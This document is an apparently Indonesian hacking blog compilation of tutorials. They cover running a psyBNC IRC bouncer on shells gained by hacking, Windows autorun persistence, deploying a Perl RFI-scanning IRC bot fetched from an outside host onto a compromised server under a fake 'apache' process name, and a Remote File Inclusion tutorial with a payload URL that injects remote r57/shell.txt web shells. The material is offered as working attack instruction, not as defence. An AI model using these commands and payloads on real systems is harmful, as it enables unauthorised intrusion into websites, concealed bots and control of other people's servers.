Car Biikin psyBNC Pakek Shell

cara bikin psyBNC nya:

1. login shell
2. wget http://psybnc.info/download/beta/psyBNC-2.3.2-7.tar.gz
3. tar -zxvf psyBNC-2.3.2-7.tar.gz
4. cd psybnc
5. ./configure
6. make
7. rm -rf salt.h
8. pico psybnc.conf
di sini kamu bisa edit port 31337 menjadi port yang kamu mau.
trus Ctrl + X ketik Y dan ENTER
9. ./psybnc
10. buka mIRC trus connect ke /server servershellnya portnya

kalo kamu dapatin shell dari cara hacking atau inject php(kalo nggak salah sih). kita kan nggak bisa login ssh, sedangkan di telnet / binddty nggak bisa gcc. solusi nya gini

1. wget realitacinta.org/tools/cbk.tar.gz
2. tar -zxvf cbk.tar.gz
3. ./config portkamu
contoh ./config 3478
4. ./fuck
untuk crontab
5. ./run

Klik disini untuk melanjutkan »»

Cara Bikin psyBNC Tanpa Shell

=================================
Instalasi psyBNC2.3.1 For Windows
=================================
DOWNLOAD
File : psybnc2.3.1.exe
http://lieur-euy.cat-on-line.com/psybnc2.3.1.exe

INSTALASI
1. Extact file psybnc2.3.1.exe pada direktory C:
2. Masuk pada direktory C:psybnc
3. Anda juga dapat merubah portnya dengan menggunakan editor text seperti Notepad Wordpad atau
yang lain, C:psybnc cari file dengan nama psybnc.conf | klik kanan | Open With ..
pada kolom [ ] Always use this program to open this file jangan di beri tanda centang
4. save : file ==>> save
5. Klik Start ==>> Run ==>> Command
6. Ikuti langkah berikut pada MS-DOS Prompt =

Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1999.

C:WINDOWSDesktop>cd..

C:WINDOWS>cd..

C:>cd psybnc..

C:psybnc>psybnc.exe
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,—-.,—-.,-. ,-.,—.,–. ,-.,—-.
| O || ,-’ / / | o || | || ,–’
| _/ _ / | o< | | || |__
|_| |____/ |__| |___||_| _| ___|
Version 2.3.1 (c) 1999-2002
the most psychoid
and the cool lam3rz Group IRCnet

`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-’
Configuration File: psybnc.conf
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 31337
psyBNC2.3.1-cBtITLdDMSNp started (PID 2080107)

C:psybnc>

7. Buka mIRC
8. Ubah IDENT pada mIRC Option sesuai dengan keinginan Anda
9. Ketik /server IP Komputer Anda 31337 <<== ini port standard (belum dirubah)

-Welcome- psyBNC2.3.1
-
–psyBNC- Your IRC Client did not supporrrt a password. Please type /QUOTE PASS
yourpassword to connect.
-

8. /QUOTE PASS (pass yang Anda inginkan)
9. /addserver irc.jmn.net.id:6667
/addserver irc.suryadata.co.id:6667

Untuk Setting psyBNC selanjutnya Anda dapat melihatnya di:

http://geocities.com/erahman2001/setingpsy

=====================================================
psyBNC Under Windows Anda Autorun
=====================================================

=========================================================
Menjalankan psyBNC Saat Memulai Windows (using start up)
=========================================================

Untuk menjalankan psyBNC saat masuk Windows secara otomatis, dapat menggunakan fasilitas
Start Up di start menu. Caranya cukup simpel, yaitu sbb :

Misalnya kita akan menjalankan psyBNC saat mulai Windows, caranya dengan menggunakan tip
berikut ini.

1. Buka windows Explorer, dan masuk ke direktory C:WINDOWSStart MenuProgramsStartUp
2. Buat shortcut untuk PsyBNC dengan mengklik kanan di area yang kosong, kemudian pilih
New >> ShortCut
3. Buat command line untuk notepad yaitu C:psybncpsybnc.exe atau pilih Browse
4. Klik tombol Next, kemudian Finish
5. Restart PC dan Windows akan otomatis menjalankan psybnc.

========================================================
Menjalankan psyBNC Saat Memulai Windows (using registry)
========================================================

Untuk menjalankan psyBNC saat masuk Windows secara otomatis, sebenarnya kita dapat menggunakan
fasilitas Start Up. Tetapi ada cara yang lebih advanced, yaitu dengan menggunakan registry.
Misalnya kita akan menjalankan psyBNC saat mulai Windows, caranya dengan menggunakan tip
berikut ini.

1. Buka Registry dengan Regedit : klik Start|Run| ketik Regedit | klik OK
2. Buka key [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
Pilih Edit | New | String Value, dan beri nama C:psybncpsybnc.exe
3. Isi valuenya dengan ‘C:psybncpsybnc.exe’
4. Restart PC

=======================================================
Menjalankan psyBNC Saat Memulai Windows (using Win.ini)
=======================================================

Ini adalah cara yang lain untuk memaksa Windows menjalankan program yang kita inginkan. Dua cara
yang lain adalah dengan cara klasik yaitu dengan Start Up menu dan dengan cara yang advanced
yaitu dengan menggunakan registry.

Cara ini menggunakan file sistem Windows yaitu Win.ini. Berikut ini adalah hal - hal yang perlu
pembaca lakukan untuk menjalankan program secara otomatis dengan menggunakan file Win.ini.
Diasumsikan program yang akan dijalankan adalah psybnc.exe yang ada di direktori C:psybnc.

1. Carilah file Win.ini yang berada di diirektori C:Windows
2. Buka dengan menggunakan editor text seeperti Notepad atau yang lain
3. Carilah entri yang bernama “load”
4. Kemudian isi dengan ‘C:psybncpsybnc.exe’, sehingga lengkapnya
menjadi “load=C:psybncpsybnc.exe”
5. Pilih menu File > Save, dan restart PC

Klik disini untuk melanjutkan »»

Cara Membuat Bot Scan RFI di mIRC

1. Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam
format txt, ato anda juga bisa langsung menggunakan milik saya

2. Masuk ke shell anda

3. cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”

4. jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp

5. wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya rekan saya, jadi commandnya “wget pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”

6. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”

7. kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt

8. Saya anggap script tersebut udah di upload, maka jalankan commandnya “perl namafile server nick ident channel owner fakeproccess” contohnya ” perl scan.txt irc.dal.net bugzz bug balihackerlink LeNK /usr/sbin/apache”

9. Jika berhasil, di shell anda akan keluar tulisan.. dan di channel yang anda join, bot akan pm anda dan beri salam “you are my master”

10. Untuk mengetahui command yang dipake, pm bot dan ketik !cmdx @help

11. Silahkan dipergunakan sebaik mungkin (untuk cari targetlah masa situs bokep)


KETERANGAN:
1. Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
3. Semua command di atas tanpa tanda petik dua (”)

SEMOGA MEMBANTU TEMEN-TEMEN........


sebenarnya, jika bot sudah masuk ke channel dan bot telah pm/pv anda dengan kata “You are my master” itu tandanya bot telah jalan. Jadi coba dengan command !cmdx @help saat pv/pm bot untuk melihat list helpnya. Script ini masih berfungsi setelah saya coba..

Klik disini untuk melanjutkan »»

Mengenal Shell inject dengan teknik Remote File Include Vulnerability

Mengenal shell exploite inject
Mungkin anda masih merasa bingung dengan shell exploite inject pada web tapi pada dasarnya semua shell sama saja cuma yang membedakan cara pemakaian shell atau bentuk dari shell itu sendiri apa berbasis aplikasi atau berbasis website tapi namanya shell jelas command - command masih sama mungkin misalkan pada shell yang aplikasi servernya berbasis linux jelas perintah yang digunakan berbasis linux juga. nah kali ini saya akan membahas tentang shell inject yang jelas saja berbasis website karena pada umumnya orang - orang memakai shell ini dalam dunia IRC biasa disebut dengan kalimat “target” saya juga heran mengapa dinamakan target? mungkin karena sudah kebiasaan padahal namanya shell inject.

Bagai mana cara mendapatkan shell tersebut?..
Mudah saja hanya dengan meman faatkan bugs bugs pada script web tersebut biasanya itu semua kelalaian dari pemakai web yang mempunyai bugs nah dalam pencarian shell inject berbasis web ini ada bermacam cara - cara injected tapi saya akan membahas cara inject dengan Remote File Inclusion Vulnerability itu menggunakan bugs dalam file script pada website yang akan di inject

Bagai mana cara melihat bugs pada suatu script aplikasi pada website?..
Hanya dengan menggunakan rumus logika panggilan data (include,require) ditambah dengan variabel pada script tersebut inlclude + $variabel semua memakai rumus seperti itu contoh script


($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');

?>

require <--- panggilan data

$docroot <--- variabel

/FCDIRECTORY/fc_functions/fc_functions.php <---

directory dan file dimana ditemukan bugs
(kerusakan atau kelemahan)

jelas pada script di atas kelihatan bugs jika dikaitkan dengan rumus include+variabel maka akan menjadi suatu shell inject tinggal kita mengolah script tersebut.

sekarang kita akan membentuk suatu script yang sebentar akan dikaitkan dengan link pada website degan cara memutar balikan script tersebut dengan mengubah kedudukan include dan variabel serta mengubah variabel yang dikenal tanda “$” menjadi “?”

$docroot.'/FCDIRECTORY/fc_functions/fc_functions.php

jika diputar balikan akan menjadi

/FCDIRECTORY/fc_functions/fc_functions.php?docroot=

Kaitan Bugs dan Link pada Website
Ini merupakan saat yang paling enak dipelajari apa kaitan bugs dengan link pada website atau target website yang akan kita masuk. Jelas kaitanya sangat erat dan wajib untuk diperlakukan. Mengapa?..karena tanpa bugs tersebut kita tidak bisa mendapatkan shell inject kita akan masuk pada website melalui bugs atau kelemahan pada website tersebut dimana letak kelemahan website tersebut?..letaknya ada pada script bugs


require

($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');

?>

sekarang kita akan menggabungkan link website dengan bugs tapi sebelumnya kita harus mempunyai injection atau code shell php anda bisa dapatkan pada link www.andi-a.biz/tools/shell.txt? atau www.andi-a.biz/tools/r57.txt?
nah sekarang akan kita gabungkan akan menjadi seperti

/FCDIRECTORY/fc_functions/
fc_functions.php?docroot=[shell code]

contoh:

www.site.com/[path]/FCDIRECTORY/fc_functions/
fc_functions.php?docroot=[shell code]

gunakan shell code :

www.andi-a.biz/tools/shell.txt?

contoh :

fc_functions.php?docroot=www.andi-a.biz/tools/shell.txt?

jika sudah menjadi seperti itu kita tinggal mencari target website yang siap kita masuk biasanya pencarian target website lewat situs pencarian seperti yahoo,google,altavista,lycos dan masih banyak lagi atau bisa menggunakan bot scan perl lewat IRC (yang menggunakan bot scan kerjaan orang malas) namun apa salahnya jika teknologi semakin berkembang menggapa tidak jika kita menggunakan sesuatu yang akan mempermudah pekerjaan kita

Screenshot Shell Inject

tampilan shell code

shell1.gif

tampilan list directory shell code

shell2.gif

Klik disini untuk melanjutkan »»